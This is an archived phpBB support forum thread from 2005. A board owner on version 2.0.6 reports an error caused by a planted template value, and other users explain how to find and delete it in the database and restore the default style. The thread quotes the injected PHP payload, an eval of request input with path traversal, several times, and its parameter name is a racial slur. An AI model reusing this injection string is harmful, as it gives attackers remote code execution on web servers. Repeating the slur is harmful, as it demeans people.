[nigga] error?

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
EvanOz85
Registered User
Posts: 6
Joined: Wed Mar 16, 2005 4:49 am

[nigga] error?

Post by EvanOz85 » Wed Mar 16, 2005 4:50 am

My forums have just gone offline, and the error message is very strange.

Code: Select all

phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 326
File : /home/stexus/public_html/jcsforum/includes/functions.php
My forum address: http://www.stex-studio.us/jcsforum/

Can anyone tell me whats the problem here? Thanks



Evan

User avatar
AdamR
Former Team Member
Posts: 9731
Joined: Tue Mar 02, 2004 5:40 pm
Location: Tampa, Florida
Name: Adam Reyher
Contact:

Post by AdamR » Wed Mar 16, 2005 4:51 am

What version of phpBB are you running?

- Adam
phpBB Support: Welcome | Userguide | Knowledge Base | Search
Honored supporter of the phpBB Group!
"If I have seen a little further it is by standing on the shoulders of Giants." - Isaac Newton

EvanOz85
Registered User
Posts: 6
Joined: Wed Mar 16, 2005 4:49 am

Post by EvanOz85 » Wed Mar 16, 2005 4:53 am

2.0.6

I never upgraded because I was afraid of screwing something up.


Evan

User avatar
Anon
Former Team Member
Posts: 7019
Joined: Fri Jan 02, 2004 7:33 am
Location: Christchurch, New Zealand

Post by Anon » Wed Mar 16, 2005 5:40 am

You'd better upgrade as soon as possible, as that isn't a normal error, and may be an attack on your board

EvanOz85
Registered User
Posts: 6
Joined: Wed Mar 16, 2005 4:49 am

Post by EvanOz85 » Wed Mar 16, 2005 5:42 am

How can I upgrade when I can't access my forums?


Evan

beatme101
Registered User
Posts: 2866
Joined: Sat Jan 01, 2005 6:20 am
Location: The country cold comes from; Canada.
Contact:

Post by beatme101 » Wed Mar 16, 2005 5:43 am

if previous threads i read were correct, your error is caused by a malicious template you tried to install.

flogger12
Registered User
Posts: 14936
Joined: Tue Nov 25, 2003 2:13 am

Post by flogger12 » Wed Mar 16, 2005 5:45 am

yep, you need to go into the database and go to the themes table and remove it
then go and make subSilver default again and you will be back in business


robert

EvanOz85
Registered User
Posts: 6
Joined: Wed Mar 16, 2005 4:49 am

Post by EvanOz85 » Wed Mar 16, 2005 5:48 am

I haven't tried to install any theme in a long time. I went into the themes table, and I don't know what I'm looking for. The only themes there are subsilver and Bluetabs. Both have been there over a year.


Evan
Last edited by EvanOz85 on Wed Mar 16, 2005 5:53 am, edited 1 time in total.

EvanOz85
Registered User
Posts: 6
Joined: Wed Mar 16, 2005 4:49 am

Post by EvanOz85 » Wed Mar 16, 2005 5:53 am

When I click the Structure tab in phpmyadmin, I get a list of template files with the names of varchar and tinyint. But when I click the Browse tab, I just see the bluetabs and subsilver. Should I delete all of the varchar and tinyint ones?

Or do you mean delete the whole themes table?

Evan

flogger12
Registered User
Posts: 14936
Joined: Tue Nov 25, 2003 2:13 am

Post by flogger12 » Wed Mar 16, 2005 6:03 am

no don't delete any of that, either in the themes table of the theme_name table when you browse you should see that line of junk

Code: Select all

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();   
etc etc
and that is what you should delete. I just did this for someone else an hour ago, the very same junk about nigga was listed in one of those tables, I deleted it, made subSilver default again and all was fixed.

robert

EvanOz85
Registered User
Posts: 6
Joined: Wed Mar 16, 2005 4:49 am

Post by EvanOz85 » Wed Mar 16, 2005 6:07 am

Don't see anything like that in the tables.


Evan

flogger12
Registered User
Posts: 14936
Joined: Tue Nov 25, 2003 2:13 am

Post by flogger12 » Wed Mar 16, 2005 7:14 am

check the config table, it has to be there somewhere or it wouldnt be trying to find it.


robert

dtandersen
Registered User
Posts: 9
Joined: Wed Mar 16, 2005 2:29 am

Post by dtandersen » Wed Mar 16, 2005 7:53 am

It replaced a theme on my installation. I corrected it by going into the database using phpMyAdmin and deleting the theme. Then I recreated the theme.

I don't think it modified any files, but I have not run a diff yet.

User avatar
Traction
Registered User
Posts: 288
Joined: Fri Jun 06, 2003 8:42 pm
Location: Staten Island, New York
Contact:

Post by Traction » Wed Mar 16, 2005 10:48 am

Having the same problem, only with subBlack. I had the same error, and just deleted subBlack in phpMyAdmin and now get this message:

"phpBB : Critical Error

Could not get theme data for themes_id [2]"

Now what? I take it I have to make subSilver default again, but how?
Failure is not an option.
Zap! Classic Video Game Forums

Syrathos
Registered User
Posts: 99
Joined: Sat Jan 22, 2005 11:24 am
Location: Australia
Contact:

Post by Syrathos » Wed Mar 16, 2005 10:54 am

Code: Select all

UPDATE `phpbb_config` SET `config_value` = '1' WHERE `config_name` = 'default_style'
That will do it.

Locked

Return to “2.0.x Support Forum”